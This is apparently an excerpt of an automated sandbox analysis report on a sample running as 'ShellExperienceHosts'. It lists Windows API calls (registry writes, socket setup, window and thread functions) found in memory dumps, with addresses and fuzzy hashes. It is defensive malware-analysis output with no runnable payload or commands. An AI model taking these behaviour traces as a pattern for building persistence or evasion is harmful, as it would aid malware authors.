                                                                            • GetProcAddress.KERNEL32(00000000,ApplicationRecoveryFinished), ref: 6C7A2EE2
                                                                            • EncodePointer.KERNEL32(00000000,?,6C6E46A1,00000001), ref: 6C7A2EEB
                                                                            • DecodePointer.KERNEL32(00000000,?,?,6C6E46A1,00000001), ref: 6C7A2EF9
                                                                             Memory Dump Source
                                                                             • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                            • String ID: ApplicationRecoveryFinished$kernel32.dll
                                                                            • API String ID: 2061474489-1962646049
                                                                            • Opcode ID: bc0d6931ce49a58c0a0a9d126d08986d2c3126f42be07b3b55e379aa0c8e16f1
                                                                            • Instruction ID: 6949dffa8b35ffbb116d1313fbb5cca4022f8d2e22f1a0c6835be016ada563f5
                                                                            • Opcode Fuzzy Hash: bc0d6931ce49a58c0a0a9d126d08986d2c3126f42be07b3b55e379aa0c8e16f1
                                                                            • Instruction Fuzzy Hash: D3F0A031705226AB8F216BA59A0C80A3B789B5A79A3000632FD09D3600DB24DC42DBE1
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 10013412
                                                                              • Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
                                                                              • Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F
                                                                            • __getptd.LIBCMT ref: 10013423
                                                                            • __getptd.LIBCMT ref: 10013431
                                                                             Memory Dump Source
                                                                             • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                            • String ID: MOC$RCC$csm
                                                                            • API String ID: 803148776-2671469338
                                                                            • Opcode ID: 6cafc6eb67b1167ca934f12c74b901a19b36c58c2209ef507fb1707306695bdb
                                                                            • Instruction ID: 786e14bf1501c0e18a8257e8a75f03574bdb54e2dd84c562cebc2d2ff3df38bd
                                                                            • Opcode Fuzzy Hash: 6cafc6eb67b1167ca934f12c74b901a19b36c58c2209ef507fb1707306695bdb
                                                                            • Instruction Fuzzy Hash: 86E01A345042488FE720DB68C04AB5933E4FBC8294F5680A5F41ECF226C738FD908942
                                                                            APIs
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,100191B0), ref: 02235A3C
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02235C36
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02235C57
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02235ADB
                                                                              • Part of subcall function 02231257: __CxxThrowException@8.LIBCMT ref: 02231267
                                                                              • Part of subcall function 02231257: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02231278
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02235CC8
                                                                            • timeGetTime.WINMM ref: 02235CCE
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$CountInitializeSpin$CreateDeleteEventException@8ExchangeInterlockedThrowTimetime
                                                                            • String ID:
                                                                            • API String ID: 2093779962-0
                                                                            • Opcode ID: eb8d99eeeeff8ed9c263c0e2c2b89902df991007dd5e8e3d3dd009670b8de4c5
                                                                            • Instruction ID: a187c8770af6b606f5260c0a57d4873b842289f31e1eae5a85cc72c28022da09
                                                                            • Opcode Fuzzy Hash: eb8d99eeeeff8ed9c263c0e2c2b89902df991007dd5e8e3d3dd009670b8de4c5
                                                                            • Instruction Fuzzy Hash: 46A1E5F0A01A56AFE315DFAAC8C4796FBA8FB09304F90462ED12DC7640D775A964CF90
                                                                            APIs
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,100191B0), ref: 02235A3C
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02235C36
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02235C57
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02235ADB
                                                                              • Part of subcall function 02231257: __CxxThrowException@8.LIBCMT ref: 02231267
                                                                              • Part of subcall function 02231257: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02231278
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02235CC8
                                                                            • timeGetTime.WINMM ref: 02235CCE
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$CountInitializeSpin$CreateDeleteEventException@8ExchangeInterlockedThrowTimetime
                                                                            • String ID:
                                                                            • API String ID: 2093779962-0
                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 6C71C69C
                                                                            • GetParent.USER32(?), ref: 6C71C6BB
                                                                            • GetParent.USER32(?), ref: 6C71C6CA
                                                                            • RedrawWindow.USER32(?,00000000,00000000,00000505,6C893370,00000000), ref: 6C71C730
                                                                            • GetParent.USER32(?), ref: 6C71C739
                                                                            • RedrawWindow.USER32(?,00000000,00000000,00000505,00000000), ref: 6C71C760
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Parent$RedrawWindow
                                                                            • String ID:
                                                                            • API String ID: 2946272266-0
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C80EC5D
                                                                            • GetDC.USER32(?), ref: 6C80ED9E
                                                                              • Part of subcall function 6C7654EE: __EH_prolog3.LIBCMT ref: 6C7654F5
                                                                            • ReleaseDC.USER32(?,00000000), ref: 6C80EE08
                                                                            • GetDeviceCaps.GDI32(?,00000058), ref: 6C80EE2F
                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 6C80EE43
                                                                            • ShowScrollBar.USER32(?,00000001,00000000,00000001,00000001,00000001,6C8AA808,6C8AA808), ref: 6C80EEFC
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDevice$H_prolog3H_prolog3_ReleaseScrollShow
                                                                            • String ID:
                                                                            • API String ID: 3992271784-0
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C7DC95E
                                                                            • CoTaskMemFree.OLE32(?,000000FF), ref: 6C7DCA97
                                                                            • GetParent.USER32(?), ref: 6C7DCAFD
                                                                            • SendMessageW.USER32(?,00000464,00000104,00000000), ref: 6C7DCB26
                                                                            • GetParent.USER32(?), ref: 6C7DCB4C
                                                                            • SendMessageW.USER32(?,00000465,00000104,00000000), ref: 6C7DCB72
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: MessageParentSend$FreeH_prolog3Task
                                                                            • String ID:
                                                                            • API String ID: 526180827-0
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 6C82E97E
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 6C82E9E9
                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C82EA06
                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,6C6C3845,C8B8FD39,00000000,00000000,00000000), ref: 6C82EA45
                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 6C82EAA4
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,6C6C3845,C8B8FD39,00000000,00000000), ref: 6C82EAC7
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiStringWide
                                                                            • String ID:
                                                                            • API String ID: 2829165498-0
                                                                            APIs
                                                                            • IsMenu.USER32(?), ref: 6C72A8BA
                                                                            • GetMenuDefaultItem.USER32(?,00000000,00000001), ref: 6C72A8E5
                                                                            • GetMenuItemCount.USER32(?), ref: 6C72A8F1
                                                                            • GetMenuItemID.USER32(?,00000000), ref: 6C72A924
                                                                            • GetSubMenu.USER32(?,00000000), ref: 6C72A973
                                                                            • GetMenuState.USER32(?,00000000,00000400), ref: 6C72A9BA
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$CountDefaultState
                                                                            • String ID:
                                                                            • API String ID: 170603052-0
                                                                            APIs
                                                                            • RegOpenKeyExW.ADVAPI32(80000002,10017554,00000000,00000102,?), ref: 02235359
                                                                            • RegDeleteValueW.ADVAPI32(?,10017568), ref: 02235369
                                                                            • RegSetValueExW.ADVAPI32(?,10017568,00000000,00000003,1001C6E0,000012A0), ref: 02235387
                                                                            • RegCloseKey.ADVAPI32(?), ref: 02235392
                                                                            • GetExitCodeProcess.KERNEL32(00000000,?), ref: 022353F2
                                                                            • Sleep.KERNEL32(00000BB8), ref: 0223540B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Value$CloseCodeDeleteExitOpenProcessSleep
                                                                            • String ID:
                                                                            • API String ID: 4289506047-0
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C75E49B
                                                                              • Part of subcall function 6C7A17CE: __EH_prolog3_catch.LIBCMT ref: 6C7A17D5
                                                                            • WSAStartup.WS2_32(00000101,?), ref: 6C75E4E0
                                                                            • WSACleanup.WS2_32 ref: 6C75E52F
                                                                            • WSASetLastError.WS2_32(0000276C), ref: 6C75E53A
                                                                            • WSACleanup.WS2_32 ref: 6C75E5DA
                                                                            • FreeLibrary.KERNEL32(?,6C75E5F5,?,6C75E5F5,00000198,6C6DC118,00000000), ref: 6C75E5E3
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Cleanup$ErrorFreeH_prolog3_H_prolog3_catchLastLibraryStartup
                                                                            • String ID:
                                                                            • API String ID: 2958719020-0
                                                                            APIs
                                                                            • GetFocus.USER32 ref: 6C7DC83C
                                                                              • Part of subcall function 6C73D911: UnhookWindowsHookEx.USER32(?), ref: 6C73D93B
                                                                            • IsWindowEnabled.USER32(00000000), ref: 6C7DC872
                                                                            • EnableWindow.USER32(00000000,00000000), ref: 6C7DC88A
                                                                            • EnableWindow.USER32(00000000,00000001), ref: 6C7DC92B
                                                                            • IsWindow.USER32(00000000), ref: 6C7DC932
                                                                            • SetFocus.USER32(00000000), ref: 6C7DC93D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnableFocus$EnabledHookUnhookWindows
                                                                            • String ID:
                                                                            • API String ID: 2931672367-0
                                                                            • Opcode ID: c0e4dfcb8ce6751bbd46ebe8c9e27b785afc769de74cc60e4ea9b49b2a05ecc0
                                                                            • Instruction ID: adf618ced343e7cd2ee375ea678be331cac85d388932bd9353547afd6941667a
                                                                            • Opcode Fuzzy Hash: c0e4dfcb8ce6751bbd46ebe8c9e27b785afc769de74cc60e4ea9b49b2a05ecc0
                                                                            • Instruction Fuzzy Hash: C0418C30700601EFDB04AF64CA88B99BBB5FF4630AF118179E41A9B691CB70B859CB95
                                                                            APIs
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02235081
                                                                            • WSASetLastError.WS2_32(0000139F,?,?,?,?,100191B0,?,?,10014228,000000FF), ref: 02235099
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 022350A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterErrorLastLeave
                                                                            • String ID:
                                                                            • API String ID: 4082018349-0
                                                                            • Opcode ID: e00a6cd020c07df668690f03d4002b5b8c2a1b96598de1bbe6df2cd43adfd620
                                                                            • Instruction ID: 6e245ac6c6153ff47d3a53368cc0315c32813894426738395c1a66cbd5fedbd8
                                                                            • Opcode Fuzzy Hash: e00a6cd020c07df668690f03d4002b5b8c2a1b96598de1bbe6df2cd43adfd620
                                                                            • Instruction Fuzzy Hash: F5319DB2A04344EBD722CF94CC85B6AB3E9EB4C711F40861AF909C7680D737E810CB50
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,29759B20,?,?,10014228,000000FF), ref: 100050AA
                                                                            • WSASetLastError.WS2_32(0000139F,?,?,?,?,29759B20,?,?,10014228,000000FF), ref: 100050C2
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 100050CC
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterErrorLastLeave
                                                                            • String ID:
                                                                            • API String ID: 4082018349-0
                                                                            • Opcode ID: e00a6cd020c07df668690f03d4002b5b8c2a1b96598de1bbe6df2cd43adfd620
                                                                            • Instruction ID: 94e9e828bd4e4f39969e9d0b2c4f8dfc3b4d38cc2041e0ad1404f002baf5890c
                                                                            • Opcode Fuzzy Hash: e00a6cd020c07df668690f03d4002b5b8c2a1b96598de1bbe6df2cd43adfd620
                                                                            • Instruction Fuzzy Hash: DE316D76A04644EBE711CF95DD86BABB3E8FB48752F008A1AF906C7645D776E800CB90
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C6FAF3A
                                                                              • Part of subcall function 6C75814E: __EH_prolog3.LIBCMT ref: 6C758155
                                                                              • Part of subcall function 6C75814E: SetRectEmpty.USER32 ref: 6C75823F
                                                                              • Part of subcall function 6C75814E: SetRectEmpty.USER32(?), ref: 6C75826A
                                                                              • Part of subcall function 6C722BD7: __EH_prolog3.LIBCMT ref: 6C722BDE
                                                                            • SetRectEmpty.USER32(?), ref: 6C6FB0A5
                                                                            • SetRectEmpty.USER32(?), ref: 6C6FB0B4
                                                                            • SetRectEmpty.USER32(?), ref: 6C6FB0BB
                                                                            • SetRectEmpty.USER32(?), ref: 6C6FB0C2
                                                                            • SetRectEmpty.USER32(?), ref: 6C6FB0EC
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: EmptyRect$H_prolog3
                                                                            • String ID:
                                                                            • API String ID: 3752103406-0
                                                                            • Opcode ID: 742e7f157d94a65cf9dbf7050177d162a17f8317b786ca019eaacbb3171b1c6b
                                                                            • Instruction ID: bec49dcc5d10e7a8ecb79df9de9baf460427396b915d7aa98cd5af05fb0e38c0
                                                                            • Opcode Fuzzy Hash: 742e7f157d94a65cf9dbf7050177d162a17f8317b786ca019eaacbb3171b1c6b
                                                                            • Instruction Fuzzy Hash: 1A51A2F09016018FC754CF29C5886D9BBE4BF99318F2885BED65D9F252EB329506CF18
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 100048E1
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 100048EC
                                                                            • Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 100048F9
                                                                            • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 10004914
                                                                            • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 1000491D
                                                                            • Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 1000492E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleObjectSingleSleepWait
                                                                            • String ID:
                                                                            • API String ID: 640476663-0
                                                                            • Opcode ID: f4c70dc776f0c36d6c3e242216426f5c740d9caf6da259f6a897f5b04df83c22
                                                                            • Instruction ID: db8a483aedded49ec56de4fe6a38a5b8db7edc3383aabb911f028b40afcbc516
                                                                            • Opcode Fuzzy Hash: f4c70dc776f0c36d6c3e242216426f5c740d9caf6da259f6a897f5b04df83c22
                                                                            • Instruction Fuzzy Hash: E6216AB61046548FD750EBA8CC8498BF3F9FF893507198B08E5948B395CA34DC05CBA4
                                                                            APIs
                                                                            • PtInRect.USER32(?,?,?), ref: 6C7069C1
                                                                            • ReleaseCapture.USER32 ref: 6C7069CF
                                                                            • PtInRect.USER32(?,?,?), ref: 6C706A24
                                                                            • InvalidateRect.USER32(?,?,00000001,?,?,?,6C705B1F,00000000,00000000,00000000), ref: 6C706A8E
                                                                            • SetTimer.USER32(?,0000EC16,00000050,00000000), ref: 6C706AB2
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
